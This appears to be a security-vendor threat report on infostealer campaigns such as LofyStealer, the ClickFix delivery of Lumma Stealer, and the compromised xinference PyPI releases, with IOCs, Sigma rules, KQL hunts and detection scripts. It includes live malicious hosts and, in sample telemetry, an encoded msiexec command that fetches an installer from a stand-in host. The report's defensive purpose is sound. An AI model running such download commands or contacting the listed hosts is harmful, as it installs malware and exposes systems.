Recent OTX pulses indicate a coordinated surge in credential theft activity targeting diverse sectors. Threat actors are leveraging sophisticated delivery chains, ranging from gaming social engineering to software supply chain compromises.
Key developments include the LofyStealer campaign targeting Minecraft players via Node.js loaders, ClickFix campaigns distributing Lumma Stealer and HijackLoader through obfuscated PowerShell, and KYCShadow, an Android banking Trojan focusing on financial sectors in India via WhatsApp. Additionally, a PyPI supply chain attack on the Xinference library highlights the ongoing risk to development environments, while GachiLoader has adopted novel AI skill lures to distribute the Rhadamanthys infostealer. Collectively, these campaigns aim to harvest browser data, banking credentials, OTPs, and cloud access keys.
Threat Actor / Malware Profile
LofyStealer (LofyGang)
- Distribution: Social engineering targeting Minecraft players; disguised within legitimate libraries.
- Payload: Two-stage malware consisting of a 53.5MB Node.js-based loader and a 1.4MB native C++ payload.
- Behavior: Executes directly in memory; extracts cookies, passwords, tokens, credit cards, and IBANs from multiple browsers.
- Evasion: Uses syscall-based evasion techniques rather than the documented Win32 API paths that EDR user-mode hooks observe.
Lumma Stealer / HijackLoader
- Distribution: ClickFix-style phishing sites tricking users into running "fix" commands.
- Payload: Obfuscated PowerShell commands downloading malicious MSI payloads.
- Behavior: Utilizes DLL sideloading with renamed legitimate binaries; drops HijackLoader shellcode and Lumma Stealer.
KYCShadow
- Distribution: WhatsApp messages posing as bank KYC verification apps.
- Payload: Multi-stage dropper with native code obfuscation.
- Behavior: Intercepts SMS/OTP, manipulates VPN traffic, uses Firebase for C2, and employs WebView-based phishing overlays.
Xinference Supply Chain (PyPI)
- Distribution: Compromised package versions (2.6.0, 2.6.1, 2.6.2) on PyPI.
- Payload: Base64-encoded malicious code in __init__.py.
- Behavior: Executes upon library import to steal cloud credentials.
GachiLoader / Rhadamanthys
- Distribution: Fake "OpenClaw" AI agent skills hosted on GitHub.
- Behavior: Social engineering lure; users download Windows binaries thinking they are AI tools; leads to fileless injection of Rhadamanthys stealer.
IOC Analysis
The provided IOCs span multiple categories indicative of diverse infrastructure:
- Network Infrastructure (IPv4/Domains):
24.152.36.241 (LofyStealer)
85.11.161.198 (Lumma/HijackLoader C2)
serv.biz, serv.xyz, api.biz (KYCShadow)
- URLs:
http://robinhuds.com:9658/ (ClickFix/Lumma)
http://85.11.161.198:6600/... (Payload delivery)
- File Hashes: A significant volume of MD5, SHA1, and SHA256 hashes associated with Node.js loaders, MSI installers, and Python library components.
SOC Operational Guidance:
- Blocklist: Block all associated IPs and domains at the perimeter and proxy. The list above is a summary of the pulse IOCs; confirm short, generic-looking names such as serv.biz and api.biz against the full pulse before blocking, since they are prone to collateral matches.
- EDR Scanning: Query EDR for the listed file hashes to find dropped payloads or loaders. Treat a hash hit as high-confidence and a hash miss as weak evidence; loaders are repackaged quickly, so the behavioural rules below carry more weight than the hash list.
- Network Detections: Alert on outbound connections to the listed hosts on the non-standard ports seen here (e.g., 9658, 6600), and on any connection to the listed domains.
Detection Engineering
Sigma Rules
title: Potential LofyStealer Node.js Loader Spawning Shell or Rundll32
id: 8c9e1a2b-3d4f-4g5h-6i7j-8k9l0m1n2o3p # Placeholder, not a valid UUIDv4; replace before deployment
description: Detects node.exe spawning cmd.exe, powershell.exe or rundll32.exe, the process tree around the LofyStealer Node.js loader staging its native C++ payload. The in-memory execution of the payload itself is not visible in process_creation telemetry; this rule catches the surrounding child processes.
status: experimental
date: 2026-04-30
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/66000000/ # Placeholder reference ID
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\node.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\rundll32.exe'
  condition: selection
falsepositives:
  - npm scripts and Node.js build tooling routinely spawn cmd.exe and powershell.exe on developer workstations; scope the rule to non-developer hosts or exclude known build paths
level: medium
tags:
  - attack.execution
  - attack.t1059.003
  - attack.t1059.007
---
title: ClickFix PowerShell Obfuscation and MSI Download
id: 9d0f2e3c-4e5g-6h7i-8j9k-0l1m2n3o4p5q # Placeholder, not a valid UUIDv4; replace before deployment
description: Detects PowerShell command lines that combine common obfuscation or execution markers with an MSI reference, as used by ClickFix lures that have the victim paste a "fix" command into the Run dialog or a terminal. Caveat: when the payload is passed via -EncodedCommand, the '.msi' string is inside the Base64 (UTF-16LE) blob and selection_msi will not match; pair this rule with decoding of encoded command lines.
status: experimental
date: 2026-04-30
author: Security Arsenal
logsource:
  product: windows
  category: process_creation
detection:
  selection_pwsh:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - 'FromBase64String'
      - 'EncodedCommand'
      - ' -enc'
      - 'IEX'
      - 'Invoke-Expression'
  selection_msi:
    CommandLine|contains: '.msi'
  filter_system:
    User|contains: 'SYSTEM' # Software deployment and maintenance run as SYSTEM; ClickFix executes in the victim's interactive session
  condition: selection_pwsh and selection_msi and not filter_system
falsepositives:
  - Administration and deployment scripts that fetch MSI packages via PowerShell
level: high
tags:
  - attack.execution
  - attack.t1059.001
  - attack.t1204.004
  - attack.defense_evasion
  - attack.t1027
  - attack.command_and_control
  - attack.t1105
---
title: PyPI Supply Chain Compromised Xinference Version Installed
id: 0e1g3h4i-5j6k-7l8m-9n0o-1p2q3r4s5t6u # Placeholder, not a valid UUIDv4; replace before deployment
description: Detects installation of the compromised xinference releases 2.6.0, 2.6.1 and 2.6.2 by matching the dist-info directory pip writes into site-packages. Importing the library puts neither the package name nor its version on a command line, so process_creation telemetry cannot reliably catch the malicious __init__.py; match the installed artefact instead and complement it with a package inventory. For Windows hosts, duplicate the rule with backslash paths.
status: experimental
date: 2026-04-30
author: Security Arsenal
logsource:
  category: file_event
  product: linux
detection:
  selection:
    TargetFilename|contains:
      - 'site-packages/xinference-2.6.0.dist-info'
      - 'site-packages/xinference-2.6.1.dist-info'
      - 'site-packages/xinference-2.6.2.dist-info'
  condition: selection
falsepositives:
  - Installation from an internal mirror that still serves these versions; verify the package contents rather than assuming they are clean
level: high
tags:
  - attack.initial_access
  - attack.t1195.002
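The file_event rule above only fires at install time, which leaves the question a responder actually has: is one of the compromised xinference releases already present in a given interpreter, or pinned in a requirements file that is about to be installed? The following is an added example, not code from the original page or from the xinference project. It uses only the Python standard library; the requirements text is constructed sample input and "sha256:placeholder" is not a real digest.

```python
# Added example (not from the original page or the xinference project): inventory check for
# the compromised xinference releases, against the running interpreter's site-packages and
# against requirements/lock file lines. Standard library only.
import importlib.metadata as md
import re
from typing import Dict, Iterable, List, Tuple

# Compromised releases named in the pulse summary; extend as further pulses land.
COMPROMISED: Dict[str, set] = {"xinference": {"2.6.0", "2.6.1", "2.6.2"}}

# name [extras] specifier ; anything after whitespace (--hash=..., markers) is ignored.
_REQ_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(\[[^\]]*\])?\s*([<>=!~]=?\s*[^;#\s]+)?")


def normalize(name: str) -> str:
    """PEP 503 normalisation: Xinference, xinference and x_inference compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def find_compromised(pairs: Iterable[Tuple[str, str]]) -> List[str]:
    """Return 'name==version' for every (name, version) pair on the compromised list."""
    hits = []
    for name, version in pairs:
        norm = normalize(name)
        if norm in COMPROMISED and version in COMPROMISED[norm]:
            hits.append(f"{norm}=={version}")
    return sorted(hits)


def installed_hits() -> List[str]:
    """Check the distributions visible to the running interpreter (one venv at a time)."""
    return find_compromised((d.metadata["Name"] or "", d.version) for d in md.distributions())


def check_requirements(lines: Iterable[str]) -> Dict[str, List[str]]:
    """Classify requirement lines for watched packages.
    blocked  : exact pin (==) to a compromised version
    unpinned : range, wildcard or bare name, which a resolver could satisfy with one"""
    result: Dict[str, List[str]] = {"blocked": [], "unpinned": []}
    for raw in lines:
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith("-"):         # skip blanks and pip options (-r, -e, ...)
            continue
        m = _REQ_RE.match(line)
        if not m or normalize(m.group(1)) not in COMPROMISED:
            continue
        name = normalize(m.group(1))
        spec = (m.group(3) or "").replace(" ", "")
        if spec.startswith("=="):
            version = spec.lstrip("=").split(",")[0]
            if "*" in version:                       # ==2.6.* is not a pin
                result["unpinned"].append(line)
            elif version in COMPROMISED[name]:
                result["blocked"].append(line)
        else:
            result["unpinned"].append(line)
    return result


# Constructed requirements.txt for illustration only; the hash value is a placeholder.
SAMPLE_REQUIREMENTS = """
# constructed requirements.txt for illustration only
numpy==1.26.4
xinference==2.6.1 --hash=sha256:placeholder
Xinference[all]>=2.5
xinference==2.5.9
-r base.txt
""".splitlines()

if __name__ == "__main__":
    print("installed:", installed_hits() or "none")
    report = check_requirements(SAMPLE_REQUIREMENTS)
    print("blocked  :", report["blocked"])
    print("unpinned :", report["unpinned"])
```

Run it inside each virtualenv or CI image, since importlib.metadata sees only the interpreter it runs under; a range such as `>=2.5` is reported as unpinned because a fresh resolve could still land on a compromised release.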
KQL (Microsoft Sentinel)
// Hunt for LofyStealer and Lumma Network Activity
let IoC_IPs = dynamic(["24.152.36.241", "85.11.161.198"]);
let IoC_Domains = dynamic(["serv.biz", "serv.xyz", "api.biz", "robinhuds.com"]);
DeviceNetworkEvents
| where Timestamp >= ago(30d)
| where RemoteIP in (IoC_IPs) or RemoteUrl has_any (IoC_Domains)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteIP, RemoteUrl, RemotePort, ActionType
| order by Timestamp desc

// Hunt for ClickFix PowerShell and Suspicious MSI Downloads
// Caveat: with -EncodedCommand the ".msi" string sits inside Base64 (UTF-16LE) and the
// substring test fails; the second clause surfaces long encoded commands for offline decoding.
DeviceProcessEvents
| where Timestamp >= ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where (ProcessCommandLine has_any ("FromBase64String", "EncodedCommand", "-enc", "IEX") and ProcessCommandLine has ".msi")
    or ProcessCommandLine matches regex @"(?i)\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}"
| where AccountName !~ "SYSTEM"   // mirrors the Sigma filter; deployment tooling runs as SYSTEM
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, ProcessCommandLine, FolderPath, SHA256
| order by Timestamp desc
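Both the ClickFix Sigma rule and the KQL hunt test for ".msi" as a substring of the raw command line, so a command passed through -EncodedCommand (Base64 of UTF-16LE) slips past them. The following is an added example, not code from the original page or its Sigma/KQL authors: it re-implements the rule in Python for exported process-creation records and adds the decoding step. The events are constructed telemetry, example.invalid is a reserved TLD, and naive_match is a literal port of the page's rule kept only to show the gap.

```python
# Added example (not from the original page or its Sigma/KQL authors): the ClickFix rule
# (powershell + obfuscation marker + ".msi", not SYSTEM) applied to process-creation
# records, with -EncodedCommand / -enc payloads decoded before the string test.
# All events below are constructed; example.invalid is a reserved TLD.
import base64
import re
from typing import Optional

OBFUSCATION_MARKERS = ("frombase64string", "encodedcommand", "-enc", "iex", "invoke-expression")

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand; the argument is one Base64 token.
_ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by an -EncodedCommand argument, or None if absent/invalid."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _is_powershell(event: dict) -> bool:
    image = event.get("Image", "").lower()
    return image.endswith("\\powershell.exe") or image.endswith("\\pwsh.exe")


def naive_match(event: dict) -> bool:
    """Literal port of the page's rule: substring checks on the raw command line only."""
    if not _is_powershell(event) or "system" in event.get("User", "").lower():
        return False
    cmd = event.get("CommandLine", "").lower()
    return any(m in cmd for m in OBFUSCATION_MARKERS) and ".msi" in cmd


def is_clickfix_candidate(event: dict) -> bool:
    """Same logic, evaluated over the raw command line plus its decoded -enc body."""
    if not _is_powershell(event) or "system" in event.get("User", "").lower():
        return False  # mirrors the rule's SYSTEM filter (it also drops any user named *system*)
    cmd = event.get("CommandLine", "")
    haystack = cmd.lower()
    decoded = decode_encoded_command(cmd)
    if decoded:
        haystack += "\n" + decoded.lower()
    return any(m in haystack for m in OBFUSCATION_MARKERS) and ".msi" in haystack


def triage(events: list) -> list:
    """Return the ids of events the decoding-aware rule flags, in input order."""
    return [e["id"] for e in events if is_clickfix_candidate(e)]


# Constructed sample telemetry (Sysmon/MDE-style fields). The encoded payload is built the
# way an operator builds it: Base64 over UTF-16LE of the script text.
HIDDEN_SCRIPT = "msiexec /i http://example.invalid/update.msi /qn"
ENCODED_PAYLOAD = base64.b64encode(HIDDEN_SCRIPT.encode("utf-16-le")).decode("ascii")
PWSH = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

SAMPLE_EVENTS = [
    {"id": "plain-clickfix", "User": "CORP\\jdoe", "Image": PWSH,
     "CommandLine": "powershell -w hidden -c \"IEX 'msiexec /i http://example.invalid/fix.msi /qn'\""},
    {"id": "encoded-clickfix", "User": "CORP\\jdoe", "Image": PWSH,
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED_PAYLOAD}"},
    {"id": "admin-script", "User": "CORP\\jdoe", "Image": PWSH,
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"id": "system-deploy", "User": "NT AUTHORITY\\SYSTEM", "Image": PWSH,
     "CommandLine": f"powershell.exe -EncodedCommand {ENCODED_PAYLOAD}"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{ev['id']:>16}  naive={naive_match(ev)!s:5}  decoding-aware={is_clickfix_candidate(ev)}")
```

The encoded-clickfix event is the one that matters: the raw command line carries the "-enc" marker but no ".msi", so the literal rule returns False, while the decoded body exposes the msiexec call. Feed real exports through is_clickfix_candidate and review decode_encoded_command output for anything the marker list does not cover.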
PowerShell Hunt Script
<#
.SYNOPSIS
IOC Hunt Script for LofyStealer, Lumma, KYCShadow (Components), Xinference, and GachiLoader.
.DESCRIPTION
Scans the file system for known malicious hashes associated with the OTX pulses.
The IOC list mixes MD5 (32 hex chars), SHA1 (40) and SHA256 (64) values, so each file is
hashed with every algorithm present in the list; hashing with MD5 alone would never match
the SHA256 entries. A full-disk hash sweep is slow; run it out of hours or scope $DrivesToScan.
Note: KYCShadow hashes are primarily Android APKs, but Windows C2 tools may exist.
#>
$TargetHashes = @(
    # LofyStealer
    "d21a5d08b4614005c8fcd9d0068f0190", "fb203c0ac030a97281960d7c28d86ebf",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881",
    # Lumma Stealer / HijackLoader
    "f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc",
    "c529217014b732abbe646046c07ce8f0366a42051839d4cb3be5b400285fc728",
    "b07a03883675654088a2b56a80933ca8", "b6a201726b44106a7dbe93a480b38420",
    # Xinference (PyPI)
    "3ee893ae46530b92e0d26435fb979d82", "484067fd6232f7cdd7b664b33857fc2c",
    "077d49fa708f498969d7cdffe701eb64675baaa4968ded9bd97a4936dd56c21c",
    # GachiLoader / Rhadamanthys (Sample)
    "076ba40e7fbf2910dff87f0c25862a70001d8ad81d23d8beae9fb9b29b603829",
    "9fb2ea25254ae53f93f0e13abb59a76a6c1ed512cdf1c1deafafa4d2758117f6"
)

# Bucket the hashes by algorithm, inferred from hex length. Get-FileHash returns uppercase
# hex, so the sets compare case-insensitively.
$HashSets = @{}
foreach ($h in $TargetHashes) {
    $algo = switch ($h.Length) { 32 { 'MD5' } 40 { 'SHA1' } 64 { 'SHA256' } default { $null } }
    if (-not $algo) { Write-Warning "Skipping hash with unrecognised length: $h"; continue }
    if (-not $HashSets.ContainsKey($algo)) {
        $HashSets[$algo] = [System.Collections.Generic.HashSet[string]]::new([System.StringComparer]::OrdinalIgnoreCase)
    }
    [void]$HashSets[$algo].Add($h)
}

Write-Host "[+] Starting IOC Hunt for Infostealer Campaigns..." -ForegroundColor Cyan
# Use drive roots: "C:" alone resolves to the current directory on that drive, not the whole volume.
$DrivesToScan = @("C:\", "D:\")
foreach ($Drive in $DrivesToScan) {
    if (-not (Test-Path -LiteralPath $Drive)) { continue }
    Write-Host "[+] Scanning $Drive for malicious files..." -ForegroundColor Yellow
    # -File skips directories (Get-FileHash cannot hash them); -Force includes hidden/system files.
    Get-ChildItem -LiteralPath $Drive -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $File = $_
            foreach ($algo in $HashSets.Keys) {
                $Hash = (Get-FileHash -LiteralPath $File.FullName -Algorithm $algo -ErrorAction SilentlyContinue).Hash
                if ($Hash -and $HashSets[$algo].Contains($Hash)) {
                    Write-Host "[!] MALICIOUS FILE FOUND ($algo): $($File.FullName)" -ForegroundColor Red
                }
            }
        }
}

# Check for suspicious Temp folders often used by Node.js loaders (LofyStealer). A node.exe
# under a user's temp or npm cache deserves a look on hosts that do not run Node.js tooling.
$TempPaths = @("$env:TEMP", "$env:APPDATA\npm-cache")
foreach ($Path in $TempPaths) {
    if (Test-Path -LiteralPath $Path) {
        Write-Host "[+] Checking for suspicious Node.js activity in $Path" -ForegroundColor Yellow
        Get-ChildItem -LiteralPath $Path -Filter "node.exe" -Recurse -File -ErrorAction SilentlyContinue | Select-Object FullName
    }
}
Write-Host "[+] Hunt Complete." -ForegroundColor Green
Response Priorities
- Immediate:
  - Block all identified IPs and domains on perimeter firewalls and proxies.
  - Initiate endpoint scans for the file hashes provided in the IOC Analysis section.
  - Isolate any endpoints showing signs of the ClickFix PowerShell pattern or LofyStealer Node.js execution.
- 24 Hours:
  - Identity Verification: Given the prevalence of infostealers (Lumma, LofyStealer, KYCShadow), force a password reset and MFA re-enrollment for accounts identified as potentially compromised during the hunt phase, and revoke active sessions and tokens as well, since stolen cookies and tokens remain valid after a password change.
  - Review Python package usage; block the compromised xinference versions (2.6.0, 2.6.1, 2.6.2) in internal PyPI mirrors and developer environments, and rotate any cloud credentials present on hosts where those versions were installed.
- 1 Week:
  - Supply Chain Hardening: Require signature verification or hash-pinned dependency files (e.g., pip install --require-hashes) in internal developer environments to prevent ingestion of malicious PyPI packages.
  - User Awareness: Conduct targeted security awareness training regarding ClickFix attacks, AI-themed lures (OpenClaw), and unsolicited KYC verification requests, especially for users in targeted regions (India).